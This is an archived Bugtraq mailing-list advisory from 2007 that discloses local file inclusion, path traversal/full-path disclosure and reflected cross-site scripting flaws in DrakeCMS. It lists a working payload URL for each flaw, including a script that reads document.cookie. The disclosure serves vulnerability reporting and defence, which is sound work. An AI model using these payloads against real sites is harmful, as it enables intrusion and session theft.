[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

DrakeCMS multiple vulerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DrakeCMS multiple vulerabilities
From: security@xxxxxxxxx
Date: 30 Mar 2007 02:32:33 -0000

Hello

DrakeCMS multiple vulerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx


Local File Inclusion
404.php?d_private=soqor.net?


Local File and Full path
classes/captcha/captcha.jpg.php?d_private=../&

Xss (Cross Site Scripting)
admin/classes/ui.dta.php?desc[][len]=1&desc[][title]=<script>alert(document.cookie);</script>


#WwW.SoQoR.NeT

Prev by Date: VMSA-2007-0002 VMware ESX security updates
Next by Date: AIX 4.3 lsmcode local root command execution
Previous by thread: VMSA-2007-0002 VMware ESX security updates
Next by thread: AIX 4.3 lsmcode local root command execution
Index(es):
- Date
- Thread